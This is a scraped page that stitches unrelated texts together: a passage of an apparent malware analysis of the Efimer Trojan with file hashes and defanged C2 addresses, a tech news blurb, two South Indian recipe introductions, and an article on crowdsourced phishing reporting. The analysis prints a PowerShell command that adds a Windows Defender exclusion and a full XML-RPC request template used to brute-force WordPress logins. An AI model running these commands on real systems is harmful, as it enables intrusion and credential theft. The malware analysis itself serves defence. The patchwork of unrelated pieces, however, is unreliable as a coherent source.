To watch a movie in the XMPEG format, the user would seemingly need to launch xmpeg_player.exe. However, this executable is actually another version of the Efimer Trojan installer. Similar to the WSF variant, this EXE installer extracts the Trojanβs main component into the C:\\Users\\Public\\Controller folder, but itβs named βntdlg.jsβ. Along with the Trojan, the installer also extracts the Tor proxy client, named βntdlg.exeβ. The installer then uses PowerShell to add the script to startup programs and the βControllerβ folder to Windows Defender exclusions.
cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Controller\'
The extracted Trojan is almost identical to the one spread via email. However, this versionβs code includes spoofed wallets for Tron and Solana, in addition to the Bitcoin, Ethereum, and Monero wallets. Also, the GUID for this version starts with βvt05β.
On some compromised machines, we uncovered several other intriguing scripts communicating with the same .onion domain as the previously mentioned ones. We believe the attackers installed these via an eval command to execute payloads from their C2 server.
Among these additional scripts, we found a file named βbtdlg.jsβ (MD5: 0f5404aa252f28c61b08390d52b7a054). This script is designed to brute-force passwords for WordPress sites.
Once executed, it generates a unique user ID, such as fb01-<4 random hex characters>, and saves it to C:\\Users\\Public\\Controller\\.
The script then initiates multiple processes to launch brute-force attacks against web pages. The code responsible for these attacks is embedded within the same script, prior to the main loop. To trigger this functionality, the script must be executed with the βBβ parameter. Within its main loop, the script initiates itself by calling the _runBruteProc function with the parameter βBβ.
After a brute-force attack is completed, the script returns to the main loop. Here, it will continue to spawn new processes until it reaches a hardcoded maximum of 20.
Thus, the script supports two modes β brute-force and the main one, responsible for the initial launch. If the script is launched without any parameters, it immediately enters the main loop. From there, it launches a new instance of itself with the βBβ parameter, kicking off a brute-force attack.
The scriptβs operation cycle involves both the brute-force code and the handler for its core logic
The brute-force process starts via the GetWikiWords function: the script retrieves a list of words from Wikipedia. This list is then used to identify new target websites for the brute-force attack. If the script fails to obtain the word list, it waits 30 minutes before retrying.
The script then enters its main operation loop. Every 30 minutes, it initiates a request to the C2 server. This is done with the help of the PingToOnion method, which is consistent with the similarly named methods found in other scripts. It sends a BUID command, transmitting a unique user ID along with brute-force statistics. This includes the total number of domains attacked, and the count of successful and failed attacks.
After this, the script utilizes the GetRandWords function to generate a list of random words sourced from Wikipedia.
Finally, using these Wikipedia-derived random words as search parameters, the script employs the getSeDomains function to search Google and Bing for domains to target with brute-force attacks.
Part of the getSeDomains function
The ObjID function calculates an eight-digit hexadecimal hash, which acts as a unique identifier for a special object (obj_id). In this case, the special object is a file containing brute-force information. This includes a list of users for password guessing, success/failure flags for brute-force attempts, and other script-relevant data. For each distinct domain, this data is saved to a separate file. The script then checks if this identifier has been encountered before. All unique identifiers are stored in a file named βUDBXX.datβ. The script searches the file for a new identifier, and if one isnβt found, itβs added. This identifier tracking helps save time by avoiding reprocessing of already known domains.
For every new domain, the script makes a request using the WPTryPost function. This is an XML-RPC function that attempts to create a test post using a potential username and password. The command to create the post looks like this:
<?xml version="1.0"?><methodCall><methodName>metaWeblog.newPost</methodName><params><param><value><string>1</string></value></param><param><value><string>' + %LOGIN%+ '</string></value></param>' + '<param><value><string>' + %PASSWORD%+ '</string></value></param>' + '<param><value><struct>' + '<member>' + '<name>title</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '<member>' + '<name>description</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '<member>' + '<name>mt_keywords</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '<member>' + '<name>mt_excerpt</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '</struct></value></param>' + '<param><value><boolean>1</boolean></value></param>' + '</params>' + '</methodCall>
When the XML-RPC request is answered, whether successfully or not, the WPGetUsers function kicks in to grab users from the domain. This function hits the domain at /wp-json/wp/v2/users, expecting a list of WordPress site users in return.
This list of users, along with the domain and counters tracking the number of users and passwords brute-forced, gets written to the special object file described above. The ID for this file is calculated with the help of ObjID. After processing a page, the script lies dormant for five seconds before moving on to the next one.
Meanwhile, multiple processes are running concurrently on the victimβs computer, all performing brute-force operations. As mentioned before, when the script is launched with the βBβ argument, it enters an infinite brute-forcing loop, with each process independently handling its targets. At the start of each iteration, thereβs a randomly chosen 1β2 second pause. This delay helps stagger the start times of requests, making the activity harder to detect. Following this, the process retrieves a random object file ID for processing from C:\\Users\\Public\\Controller\\objects by calling ObjGetW.
The ObjGetWΒ function snags a random domain object thatβs not currently tied up by a brute-force process. Locked files are marked with the LOCK extension. Once a free, random domain is picked for brute-forcing, the lockObjΒ function is called. This changes the fileβs extension to LOCK so other processes donβt try to work on it. If all objects are locked, or if the chosen object canβt be locked, the script moves to the next loop iteration and tries again until it finds an available file. If a file is successfully acquired for processing, the script extracts data from it, including the domain, password brute-force counters, and a list of users.
Based on these counter values, the script checks if all combinations have been exhausted or if the maximum number of failed attempts has been exceeded. If the attempts are exhausted, the object is deleted, and the process moves on to a new iteration. If attempts remain, the script tries to authenticate with the help of hardcoded passwords.
When attempting to guess a password for each user, a web page post request is sent via the WPTryPostΒ function. Depending on the outcome of the brute-force attempt, ObjUpd is called to update the status for the current domain and the specific username-password combination.
After the status is updated, the object is unlocked, and the process pauses randomly before continuing the cycle with a new target. This ensures continuous, multi-threaded credential brute-forcing, which is also regulated by the script and logged in a special file. This logging prevents the script from starting over from scratch if it crashes.
Successfully guessed passwords are sent to the C2 with the GOOD command.
We also discovered another script named βassembly.jsβ (MD5: 100620a913f0e0a538b115dbace78589). While similar in functionality to controller.js and ntdlg.js, it has several significant differences.
Similarly to the first script, this one belongs to the ClipBanker type. Just like its predecessors, this malware variant reads a unique user ID. This time it looks for the ID at C:\\Users\\Public\\assembly\\GUID. If it canβt find or read that ID, it generates a new one. This new ID follows the format M11-XXXX-YYYY, where XXXX and YYYY are random four-digit hexadecimal numbers. Next up, the script checks if itβs running inside a virtual machine environment.
If it detects a VM, it prefixes the GUID string with a βVβ; otherwise, it uses an βRβ. Following this, the directory where the GUID is stored (which appears to be the scriptβs main working directory) is hidden.
After that, a file named βlptimeβ is saved to the same directory. This file stores the current time, minus 21,000 seconds. Once these initial setup steps are complete, the malware enters its main operation loop. The first thing it does is check the time stored in the βlptimeβ file. If the difference between the current time and the time in the file is greater than 21,600 seconds, it starts preparing data to send to the server.
After that, the script attempts to read data from a file named βgeipβ, which it expects to find at C:\\Users\\Public\\assembly\\geip. This file contains information about the infected deviceβs country and IP address. If itβs missing, the script retrieves information from https://ipinfo.io/json and saves it. Next, it activates the Tor service, located at C:\\Users\\Public\\assembly\\upsvc.exe.
Afterwards, the script uses the function GetWalletsList to locate cryptocurrency wallets and compile a list of its findings.
It prioritizes scanning of browser extension directories for Google Chrome and Brave, as well as folders for specific cryptocurrency wallet applications whose paths are hardcoded within the script.
The script then reads a file named βdataβ from C:\\Users\\Public\\assembly. This file typically contains the results of previous searches for mnemonic phrases in the clipboard. Finally, the script sends the data from this file, along with the cryptocurrency wallets it discovered from application folders, to a C2 server at:
http://he5vnov645txpcv57el2theky2elesn24ebvgwfoewlpftksxp4fnxad[.]onion/assembly/route.php
After the script sends the data, it verifies the serverβs response with the help of the CheckOnionCMD function, which is similar to the functions found in the other scripts. The serverβs response can contain one of the following commands:
Next, the script scans the clipboard for strings that resemble mnemonic phrases and cryptocurrency wallet addresses.
Any discovered data is then XOR-encrypted using the key $@#LcWQX3$ and saved to a file named βdataβ. After these steps, the entire cycle repeats.
This script operates as another spy, much like the others weβve discussed, and shares many similarities. However, its purpose is entirely different. Its primary goal is to collect email addresses from specified websites and send them to the C2 server. The script receives the list of target websites as a command from the C2. Letβs break down its functionality in more detail.
At startup, the script first checks for the presence of the LUID (unique identifier for the current system) in the main working directory, located at C:\\Users\\Public\\Controller\\LUID. If the LUID cannot be found, it creates one via a function similar to those seen in other scripts. In this case, the unique identifier takes the format fl01-<4 random hex characters>.
Next, the checkUpdate() function runs. This function checks for a file at C:\\Users\\Public\\Controller\\update_l.flag. If the file exists, the script waits for 30 seconds, then deletes update_l.flag, and terminates its operation.
Afterwards, the script periodically (every 10 minutes) sends a request to the server to receive commands. It uses a function named PingToOnion, which is similar to the identically named functions in other scripts.
The request includes the following parameters:
In this section of the code, LIAM string is used as the action, and the data parameter contains the number of collected email addresses along with the script operation statistics.
If the script unexpectedly terminates due to an error, it can send a log in addition to the statistics, where the action parameter will contain LOGS string, and the data parameter will contain the error message.
The request is sent to the following C2 address:
http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/route.php
The server returns a JSON-like structure, which the next function later parses.
The structure dictates the commands the script should execute.
This script supports two primary functions:
The script receives domains and iterates through each one to find hyperlinks and email addresses on the website pages.
The GetPageLinks function parses the HTML content of a webpage and extracts all links that reside on the same domain as the original page. This function then filters these links, retaining only those that point to HTML/PHP files or files without extensions.
The PageGetLiameΒ function extracts email addresses from the pageβs HTML content. It can process both openly displayed addresses and those encapsulated within mailto linksΒ .
Following this initial collection, the script revisits all previously gathered links on the C2-provided domains, continuing its hunt for additional email addresses. Finally, the script de-duplicates the entire list of harvested email addresses and saves them for future use.
pstack and buffer, where:
pstack is an array of domains to which subsequent POST requests will be sent;buffer is an array of strings, each containing data in the format of address,subject,message.The script randomly selects a domain from pstack and then uploads one of the strings from the buffer parameter to it. This part of the script likely functions as a spam module, designed to fill out forms on target websites. For each successful data submission via a POST request to a specific domain, the script updates its statistics (which we mentioned earlier) with the number of successful transmissions for that domain.
If an error occurs within this loop, the script catches it and reports it back to the C2 server with the LOGS command.
Throughout the code, youβll frequently encounter the term βLiameβ, which is simply βEmailβ spelled backwards. Similarly, variations like βLiamaβ, βLiamβ, and βLiamsβ are also present, likely derived from βLiameβ. This kind of βwordplayβ in the code is almost certainly an attempt to obscure the malicious intent of its functions. For example, instead of a clearly named βPageGetEmailβ function, youβd find βPageGetLiameβ.
From October 2024 through July 2025, Kaspersky solutions detected the Efimer Trojan impacting 5015 Kaspersky users. The malware exhibited its highest level of activity in Brazil, where attacks affected 1476 users. Other significantly impacted countries include India, Spain, Russia, Italy, and Germany.
TOP 10 countries by the number of users who encountered Efimer (download)
The Efimer Trojan combines a number of serious threats. While its primary goal is to steal and swap cryptocurrency wallets, it can also leverage additional scripts to compromise WordPress sites and distribute spam. This allows it to establish a complete malicious infrastructure and spread to new devices.
Another interesting characteristic of this Trojan is its attempt to propagate among both individual users and corporate environments. In the first case, attackers use torrent files as bait, allegedly to download popular movies; in the other, they send claims about the alleged unauthorized use of words or phrases registered by another company.
Itβs important to note that in both scenarios, infection is only possible if the user downloads and launches the malicious file themselves. To protect against these types of threats, we urge users to avoid downloading torrent files from unknown or questionable sources, always verify email senders, and consistently update their antivirus databases.
For website developers and administrators, itβs crucial to implement measures to secure their resources against compromise and malware distribution. This includes regularly updating software, using strong (non-default) passwords and two-factor authentication, and continuously monitoring their sites for signs of a breach.
Hashes of malicious files
39fa36b9bfcf6fd4388eb586e2798d1a β Requirement.wsf
5ba59f9e6431017277db39ed5994d363 β controller.js
442ab067bf78067f5db5d515897db15c β xmpeg_player.exe
16057e720be5f29e5b02061520068101 β xmpeg_player.exe
627dc31da795b9ab4b8de8ee58fbf952 β ntdlg.js
0f5404aa252f28c61b08390d52b7a054 β btdlg.js
eb54c2ff2f62da5d2295ab96eb8d8843 β liame.js
100620a913f0e0a538b115dbace78589 β assembly.js
b405a61195aa82a37dc1cca0b0e7d6c1 β btdlg.js
Hashes of clean files involved in the attack
5d132fb6ec6fac12f01687f2c0375353 β ntdlg.exe (Tor)
Websites
hxxps://lovetahq[.]com/sinners-2025-torent-file/
hxxps://lovetahq[.]com/wp-content/uploads/2025/04/movie_39055_xmpg.zip
C2 URLs
hxxp://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion
hxxp://he5vnov645txpcv57el2theky2elesn24ebvgwfoewlpftksxp4fnxad[.]onion
As scams continue to target users via messaging apps, Meta decided to jazz up theβ¦
WhatsApp Rolls Out Safety Overview As An Anti-Scam Feature on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
Karthigai Deepam is a highly celebrated festival in Southern India, particularly in Tamil Nadu. It is a time for people to honour Lord Shiva as a divine flame during the Tamil month of Karthigai (November-December). This festival is also known as the Festival of Lights and is a grand affair.
As part of the celebration, people illuminate their homes with lamps to symbolize the triumph of light over darkness and ignorance. It is a beautiful sight that fills everyoneβs hearts with hope and inspiration. The day is marked with prayers, rituals, and the lighting of a massive lamp on the hill of Arunachala in Thiruvannamalai, an awe-inspiring sight.
Sweet Karthigai Adai is a delectable treat that adds to the joy of the festival. It is prepared with great care and devotion, using rice, lentils, jaggery, coconut, and cardamom. These adais are a cherished offering during Karthigai Deepam, bringing sweetness and symbolism to the celebration. It is a testament to the love and unity among families and communities.
Enjoy the video of Karthiga Vella Adai. Subscribe for more videos.
Now, let us see how to prepare this recipe.
Delicious Karthigai Vella Adai is ready to serve God as Prashad.
If you found this post useful, I would really love it if you pin it or share it with your Facebook fans, Twitter followers, or Google+ circles today. All it takes is a simple click on the βpin itβ, βlike,β βshare,β βTweet,β or Google+ buttons below the post. It will keep me motivated. Thank you!
Β
Almost every day, my spouse and I have a conversation about spam. Not the canned meat, but the number of unwelcomed emails and text messages we receive. He gets several nefarious text messages a day, while I maybe get one a week. Phishing emails come in waves β right now, Iβm getting daily warnings that my AV software license is about to expire. Blocking or filtering has limited success and, as often as not, flags wanted rather than unwanted messages.
Our ritual of comparing phishing attempts acts as informal security crowdsourcing. While most of these messages are clearly a poor attempt at social engineering, something realistic seeps in every so often.
So we talk about it. We review basic security practices. Just one wrong click could have a devastating impact on his work network.
We all know that phishing and malicious messages have been effective attack vectors since the earliest days of the internet, and yet users continue to fall victim. Spammers and threat actors know that recipients of these messages will continue to fall for their schemes.
What helps threat actors and hurts the rest of us is the inability to do anything to stop phishing attacks. Itβs not just a matter of filtering something to go into the junk folder.
What will make a difference is the ability to take the information about malicious messaging and report it back to communication providers, network administrators and security teams so everyone can work together to eliminate threats.
Using crowdsourcing as a way to prevent phishing attacks builds on other popular crowdsourced security methods. Large tech companies have used bug bounties for years, with monetary rewards offered to users who find vulnerabilities in their systems.
The more people who look for something, the greater their chance of finding it. This is the theory that crowdsourcing is based on. Some organizations see crowdsourcing as ongoing penetration testing, and if the rewards are high enough, users will continue to be watchful for potential bugs in the system.
But as weβve seen repeatedly, what works for security works for the bad guys as well. Threat actors also use crowdsourcing for cyber crime.
βCyber crime is just crowdsourced security but without any of the ethical elements. The reward structure mimics the way that cyber crime operates more closely than traditional security testing methods,β explained a blog post from Detectify.
A study conducted by ETH Zurich found that the exercises used to train users to recognize phishing attempts have the opposite effect β rather than becoming resilient, users become more susceptible to falling for nefarious messaging. What does work, the research found, was crowdsourcing through collective phishing detection.
βSuch crowdsourcing allows fast detection of new phishing campaigns, the operational load for the organization is acceptable and the employees remain active over long periods of time,β the report stated.
When a βReport Phishingβ button was added to an email platform, the study found that users would report suspicious emails within five to 30 minutes of receipt. Users were fairly accurate in detecting a potentially dangerous email: they were right 68% of the time for a phishing attack and 79% when spam was included.
Even better, there appears to be no reporting fatigue for users and little burden to organizations adopting a crowdsourcing system. The quick response from the users means that security teams can address the threat quickly.
Crowdsourcing goes beyond internal security. The ultimate goal is to leverage information from individual users to detect and prevent phishing attacks on millions of users within a network.
For example, with the release of iOS 16, users have the ability to report spam sent through iMessage directly to Apple. This wonβt prevent the sender from sending messages, but the userβs device will block further messages once reported. Itβs an option that has been available on Android devices for a while.
MSSPs and security vendors are using tools and applications that share phishing information across their network of clients. When one user or company reports a suspected phishing message through the tool, this information can benefit investigations of similar attacks against other organizations and stop potential threats.
The federal government also encourages crowdsourcing phishing information. On the Federal Trade Commissionβs phishing information page, users can take a quiz to test their knowledge of phishing attacks and are urged to forward phishing emails to the Anti-Phishing Working Group (APWG) at reportphishing@apwg.org. APWG analyzes this data to build phishing activity trend reports. Organizations can see the type of impacts phishing attacks have β what industries are seeing the most attacks, how the attacks are happening and the type of malware (mostly ransomware) affecting networks β and then use the information to offer the best security plan for their needs.
Sharing data surrounding phishing attacks and other types of malicious messaging allows organizations to develop more effective cybersecurity defense systems and increases overall security awareness. As the ETH Zurich study showed, traditional methods of phishing awareness training have been found wanting. Actively engaging employees to not only know how to spot phishing attacks but also to properly report them will increase their own sense of ownership in the organizationβs security posture. Once more invested, they are more likely to use better security practices more consistently. In the long run, this helps organizations reduce costs related to cyber risks.
When done right, crowdsourcing security is an effective cybersecurity tool, especially for phishing and malicious messaging attacks.
The post Why Crowdsourced Security is Devastating to Threat Actors appeared first on Security Intelligence.
βAppamβ as it is called in Tamil is a breakfast delicacy which is very popular in South India and Sri Lanka. Hopper is the anglicized version of the name. The βAppamβis basically a fermented bowl shaped rice flour pancake with a soft, spongy, fluffy centre and a thin crispy, lace like network of fine bubbles...
The post Appams (Rice Hoppers) appeared first on Mamas Secret Recipes.
